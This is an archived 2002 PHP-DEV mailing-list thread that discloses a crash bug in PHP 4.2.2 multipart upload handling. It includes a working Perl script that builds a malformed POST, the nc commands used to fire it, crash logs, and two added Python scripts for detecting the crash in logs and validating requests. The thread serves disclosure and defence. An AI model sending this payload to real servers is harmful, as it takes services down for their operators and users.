Re: [PHP-DEV] Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV (fwd)

2002-07-25 Thread David Brown

On Wed, Jul 24, 2002 at 01:37:12PM -0700, Thomas Cannon wrote:
 -- Forwarded message --
 Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
 From: Dan Kalowsky [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
 
 Please send it to [EMAIL PROTECTED]
 
 (Okay, that's easy enough -- I posted this in the web form, but it
 wrapped all to hell. Thanks for the email address, Mr. Kalowsky)
 
 Hello. While working on an exploit for the multipart_buffer_headers() hole
 that you just fixed, I found another problem that you might want to
 look into. It looks like a DoS only, but there might be a way to execute
 arbitrary code and I just haven't found it yet. Credit for the find goes
 to myself and members of the [0dd] 0-Day Digest.

FWIW, I was able to reproduce the SEGV, one per connection, on a Linux
2.4.18 server here.

- Dave
  [EMAIL PROTECTED]


-- 
PHP Development Mailing List http://www.php.net/
To unsubscribe, visit: http://www.php.net/unsub.php
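David's "one SEGV per connection" is exactly what the error_log excerpt in the forwarded report below shows: one "child pid ... exit signal Segmentation fault (11)" line for each POST, while the access_log still records the POSTs with status 200 and no byte count, so the status code alone gives nothing to alert on. The script below is an added example, not code from this thread or from Apache or PHP; it parses constructed sample lines in the same format as the report's access_log and error_log and ties each child crash to the requests logged within a few seconds of it, which is how a defender would pick out the source host. The sample lines, the five-second window and the helper names are assumptions made for the example.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample lines in the same shape as the report's access_log and
# error_log excerpts (assumed data, not copied from a live server).
ACCESS_LOG = """\
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
192.0.2.7 - - [23/Jul/2002:21:12:00 -0700] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""
ERROR_LOG = """\
[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11)
"""

ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
SEGV_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) '
    r'exit signal Segmentation fault \(11\)')


def parse_access(text):
    """Combined-format access log -> list of dicts with a naive local timestamp."""
    rows = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        # Drop the UTC offset: error_log timestamps carry none, and both logs
        # are written in the server's local time, so compare wall-clock values.
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        rows.append({"ts": ts, "host": m["host"], "req": m["req"],
                     "status": m["status"], "size": m["size"], "ua": m["ua"]})
    return rows


def parse_segfaults(text):
    """error_log -> list of (timestamp, child pid) for children killed by SIGSEGV."""
    out = []
    for line in text.splitlines():
        m = SEGV_RE.match(line)
        if m:
            out.append((datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["pid"]))
    return out


def correlate(access, segfaults, window_seconds=5):
    """For each child crash, collect the requests logged within +/- window_seconds."""
    win = timedelta(seconds=window_seconds)
    hits = []
    for ts, pid in segfaults:
        near = [r for r in access if abs(r["ts"] - ts) <= win]
        hits.append({"pid": pid, "ts": ts, "requests": near})
    return hits


def suspect_sources(hits):
    """Count which (client host, request line) pairs sit next to the crashes."""
    return Counter((r["host"], r["req"]) for h in hits for r in h["requests"])


if __name__ == "__main__":
    hits = correlate(parse_access(ACCESS_LOG), parse_segfaults(ERROR_LOG))
    for h in hits:
        print(f"child {h['pid']} segfaulted at {h['ts']:%H:%M:%S}; "
              f"{len(h['requests'])} request(s) within the window")
    for (host, req), n in suspect_sources(hits).most_common():
        print(f"{n:3d}  {host}  {req}")
```

On a busy server the window will catch unrelated requests too; what makes a source stand out is the same host and request line recurring next to every crash, which is what the counter surfaces.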




[PHP-DEV] Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV (fwd)

2002-07-24 Thread Thomas Cannon

-- Forwarded message --
Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
From: Dan Kalowsky [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV

Please send it to [EMAIL PROTECTED]

(Okay, that's easy enough -- I posted this in the web form, but it
wrapped all to hell. Thanks for the email address, Mr. Kalowsky)

Hello. While working on an exploit for the multipart_buffer_headers() hole
that you just fixed, I found another problem that you might want to
look into. It looks like a DoS only, but there might be a way to execute
arbitrary code and I just haven't found it yet. Credit for the find goes
to myself and members of the [0dd] 0-Day Digest.

Thanks,

Thomas Cannon

---

[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html
Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_setenvif.c
mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#

/* change over to my remote machine, stereophonic */

[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[1] 90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[2] 90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[3] 90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[4] 90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80

[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
# Emits one hand-built HTTP request on stdout (piped into nc above).
headers();
sub headers {
print "POST /vuln/upload.php HTTP/1.0\n";
print "Referer: http://www.noops.org\n";
print "Connection: Keep-Alive\n";
print "User-Agent: killer-loop.pl\n";
print "Host: www.noops.org\n";
print "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n";
print "Accept-Encoding: gzip\n";
print "Accept-Language: en\n";
print "Accept-Charset: iso-8859-1,*,utf-8\n";
print "Content-type: multipart/form-data; boundary=xnyLAaB03X\n";
# Declared length is larger than the body that actually follows.
print "Content-length: 246\n\n\n\n";
print "--xnyLAaB03X\n";
# Part header with a 100-byte field name, no terminating blank line and no
# closing boundary.
print "Content-Disposition: form-data; name=" . "A" x 100;
}

/* then back to spoon, the webserver... The 'reviewer' script is a little
thing I whipped up to keep a note of where I last read the apache_log  and
error_log from, and it also weeds out the code red and nimda background
noise -- you'd see this same output from 'tail' or a similar utility   */

/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault   */

[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"

Now it's the error log...

[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal Segmentation fault (11)

[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as i386-unknown-freebsd...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
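What header.pl sends is a multipart/form-data request whose declared Content-length (246) is larger than the body that follows, whose single part's headers are never terminated by a blank line, and which has no closing boundary at all. The validator below is an added example, not PHP's multipart code and not from this thread; it shows the checks a parser should apply to such a request before trusting any of those values, run against a constructed well-formed upload and a constructed copy of the request header.pl emits. The byte limits, the function names and both sample requests are assumptions made for the example.

```python
import re

# Limits a cautious parser enforces instead of trusting the peer (assumed values).
MAX_PART_HEADER_BYTES = 4096
MAX_FIELD_NAME_LEN = 64

# Constructed well-formed upload: one text field, CRLF line ends, closing boundary.
GOOD_BODY = (b"--xnyLAaB03X\r\n"
             b'Content-Disposition: form-data; name="comment"\r\n'
             b"\r\n"
             b"hello\r\n"
             b"--xnyLAaB03X--\r\n")
GOOD_REQUEST = (b"POST /vuln/upload.php HTTP/1.0\r\n"
                b"Host: www.noops.org\r\n"
                b"Content-Type: multipart/form-data; boundary=xnyLAaB03X\r\n"
                b"Content-Length: " + str(len(GOOD_BODY)).encode() + b"\r\n\r\n" + GOOD_BODY)

# Constructed copy of what header.pl in the report emits: bare LF line ends,
# Content-length 246 for a 152-byte body, a part header with no terminating
# blank line and no closing boundary.
BAD_REQUEST = (b"POST /vuln/upload.php HTTP/1.0\n"
               b"Host: www.noops.org\n"
               b"Content-type: multipart/form-data; boundary=xnyLAaB03X\n"
               b"Content-length: 246\n\n\n\n"
               b"--xnyLAaB03X\n"
               b"Content-Disposition: form-data; name=" + b"A" * 100)


def _split_head_body(raw):
    """Split an HTTP message at the first blank line (CRLF or bare LF)."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        i = raw.find(sep)
        if i != -1:
            return raw[:i], raw[i + len(sep):]
    return raw, b""


def _parse_headers(block, skip_first=False):
    """'Name: value' lines -> dict keyed by lower-cased name (last value wins)."""
    lines = block.split(b"\n")[1:] if skip_first else block.split(b"\n")
    headers = {}
    for line in lines:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def validate_multipart(raw):
    """Return the reasons to reject the request; an empty list means it is well formed."""
    problems = []
    head, body = _split_head_body(raw)
    h = _parse_headers(head, skip_first=True)
    clen = h.get("content-length")
    if clen is None or not clen.isdigit():
        problems.append("Content-Length missing or not numeric")
    elif int(clen) != len(body):
        problems.append(f"Content-Length {clen} but {len(body)} body bytes received")
    ctype = h.get("content-type", "")
    m = re.search(r'boundary=("?)([^";\s]+)\1', ctype)
    if not ctype.lower().startswith("multipart/form-data") or m is None:
        problems.append("not multipart/form-data with a boundary")
        return problems
    delim = b"--" + m.group(2).encode("latin-1")
    if delim + b"--" not in body:
        problems.append("closing boundary missing")
    pos = body.find(delim)
    if pos == -1:
        problems.append("first boundary missing")
        return problems
    part_no = 0
    while True:
        pos += len(delim)
        if body[pos:pos + 2] == b"--":
            break                                     # closing delimiter: done
        eol = body.find(b"\n", pos)
        if eol == -1:
            problems.append(f"part {part_no}: boundary line not terminated")
            break
        # Part headers must end with a blank line within a bounded number of bytes.
        hdr_start, hdr_end, sep_len = eol + 1, -1, 0
        for sep in (b"\r\n\r\n", b"\n\n"):
            j = body.find(sep, hdr_start, hdr_start + MAX_PART_HEADER_BYTES)
            if j != -1 and (hdr_end == -1 or j < hdr_end):
                hdr_end, sep_len = j, len(sep)
        if hdr_end == -1:
            problems.append(f"part {part_no}: headers not terminated within "
                            f"{MAX_PART_HEADER_BYTES} bytes")
            break
        disp = _parse_headers(body[hdr_start:hdr_end]).get("content-disposition", "")
        nm = re.search(r'(?:^|;\s*)name=("?)([^";]*)\1', disp)
        if not disp.lower().startswith("form-data") or nm is None:
            problems.append(f"part {part_no}: Content-Disposition is not form-data with a name")
        elif len(nm.group(2)) > MAX_FIELD_NAME_LEN:
            problems.append(f"part {part_no}: field name longer than {MAX_FIELD_NAME_LEN} bytes")
        nxt = body.find(delim, hdr_end + sep_len)
        if nxt == -1:
            problems.append(f"part {part_no}: no boundary after the part body")
            break
        pos, part_no = nxt, part_no + 1
    return problems


if __name__ == "__main__":
    for label, req in (("well-formed", GOOD_REQUEST), ("header.pl-style", BAD_REQUEST)):
        print(label, "->", validate_multipart(req) or "accepted")
```

The point of bounding the header search and checking for the blank line before reading any field is that a parser which scans for terminators it assumes are present will read past the end of what the client sent; refusing the request on the first missing terminator keeps every later read inside the buffer.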